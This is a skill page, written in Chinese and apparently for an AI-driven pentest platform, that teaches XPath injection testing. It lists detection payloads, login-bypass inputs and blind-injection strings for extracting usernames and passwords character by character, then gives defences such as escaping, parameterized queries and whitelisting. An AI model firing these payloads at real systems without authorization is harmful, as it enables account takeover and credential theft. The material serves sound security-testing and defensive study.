
xpath-injection-testing
by Ed1s0nZ
CyberStrikeAI is an AI-native security testing platform built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, and comprehensive lifecycle management capabilities.
SKILL.md
name: xpath-injection-testing description: XPath注入漏洞测试的专业技能和方法论 version: 1.0.0
XPath注入漏洞测试
概述
XPath注入是一种类似于SQL注入的漏洞,利用XPath查询语句的构造缺陷,可能导致信息泄露、认证绕过等。本技能提供XPath注入的检测、利用和防护方法。
漏洞原理
应用程序将用户输入直接拼接到XPath查询语句中,未进行充分验证和过滤,导致攻击者可以修改查询逻辑。
危险代码示例:
String xpath = "//user[username='" + username + "' and password='" + password + "']";
XPathExpression expr = xpath.compile(xpath);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);
XPath基础
查询语法
基础查询:
//user[username='admin']
//user[@id='1']
//user[username='admin' and password='pass']
//user[username='admin' or username='user']
函数
常用函数:
text()- 获取文本内容count()- 计数substring()- 子字符串string-length()- 字符串长度contains()- 包含检查
测试方法
1. 识别XPath输入点
常见功能:
- 用户登录
- 数据搜索
- XML数据查询
- 配置查询
2. 基础检测
测试特殊字符:
' or '1'='1
' or '1'='1' or '
' or 1=1 or '
') or ('1'='1
测试逻辑操作符:
' or '1'='1
' and '1'='2
' or 1=1 or '
3. 认证绕过
基础绕过:
用户名: admin' or '1'='1
密码: anything
查询: //user[username='admin' or '1'='1' and password='anything']
更精确的绕过:
用户名: admin') or ('1'='1
查询: //user[username='admin') or ('1'='1' and password='*']
4. 信息泄露
枚举用户:
' or 1=1 or '
' or '1'='1
') or 1=1 or ('
获取节点数量:
' or count(//user)>0 or '
获取特定节点:
' or substring(//user[1]/username,1,1)='a' or '
利用技术
认证绕过
方法1:逻辑绕过
输入: admin' or '1'='1
查询: //user[username='admin' or '1'='1' and password='*']
结果: 匹配所有用户
方法2:注释绕过
输入: admin')] | //* | //*[('
查询: //user[username='admin')] | //* | //*[('' and password='*']
方法3:布尔盲注
' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,1,1)='b' or '
信息泄露
枚举所有用户:
' or 1=1 or '
结果: 返回所有用户节点
获取用户名:
' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,2,1)='d' or '
逐步获取每个字符
获取密码:
' or substring(//user[1]/password,1,1)='p' or '
逐步获取密码字符
盲注技术
基于时间的盲注:
' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '
基于布尔值的盲注:
' or substring(//user[1]/username,1,1)='a' or '
观察响应差异
绕过技术
编码绕过
URL编码:
' or '1'='1 → %27%20or%20%271%27%3D%271
HTML实体编码:
' → '
" → "
< → <
> → >
注释绕过
使用注释:
' or 1=1 or '
' or '1'='1' or '
函数绕过
使用不同函数:
substring(//user[1]/username,1,1)
substring(//user[position()=1]/username,1,1)
//user[1]/username/text()[1]
工具使用
XPath表达式测试
在线工具:
- XPath Tester
- XMLSpy
- Oxygen XML Editor
Burp Suite
- 拦截XPath查询请求
- 修改查询参数
- 观察响应结果
Python脚本
from lxml import etree
from lxml.etree import XPath
# 加载XML文档
doc = etree.parse('users.xml')
# 测试注入
xpath_expr = "//user[username='admin' or '1'='1']"
xpath = XPath(xpath_expr)
results = xpath(doc)
print(results)
验证和报告
验证步骤
- 确认可以控制XPath查询
- 验证认证绕过或信息泄露
- 评估影响(未授权访问、数据泄露等)
- 记录完整的POC
报告要点
- 漏洞位置和输入参数
- XPath查询构造方式
- 完整的利用步骤和PoC
- 修复建议(输入验证、参数化查询等)
防护措施
推荐方案
-
输入验证
private static final String[] XPATH_ESCAPE_CHARS = {"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "}; public static String escapeXPath(String input) { if (input == null) { return null; } StringBuilder sb = new StringBuilder(); for (int i = 0; i < input.length(); i++) { char c = input.charAt(i); if (Arrays.asList(XPATH_ESCAPE_CHARS).contains(String.valueOf(c))) { sb.append("\\"); } sb.append(c); } return sb.toString(); } -
参数化查询
// 使用XPath变量 String xpath = "//user[username=$username and password=$password]"; XPathExpression expr = xpath.compile(xpath); XPathVariableResolver resolver = new MapVariableResolver( Map.of("username", escapedUsername, "password", escapedPassword)); expr.setXPathVariableResolver(resolver); -
白名单验证
// 只允许特定字符 if (!input.matches("^[a-zA-Z0-9@._-]+$")) { throw new IllegalArgumentException("Invalid input"); } -
使用预编译查询
// 预定义查询模板 private static final String LOGIN_QUERY = "//user[username=$1 and password=$2]"; // 使用参数绑定 -
最小权限
- 限制XPath查询范围
- 使用访问控制
- 限制可查询的节点
注意事项
- 仅在授权测试环境中进行
- 注意不同XPath版本的语法差异
- 测试时避免对XML数据造成影响
- 了解目标应用的XPath实现
Score
Total Score
Based on repository quality metrics
SKILL.mdファイルが含まれている
ライセンスが設定されている
100文字以上の説明がある
GitHub Stars 500以上
1ヶ月以内に更新
10回以上フォークされている
オープンIssueが50未満
プログラミング言語が設定されている
1つ以上のタグが設定されている
Reviews
Reviews coming soon

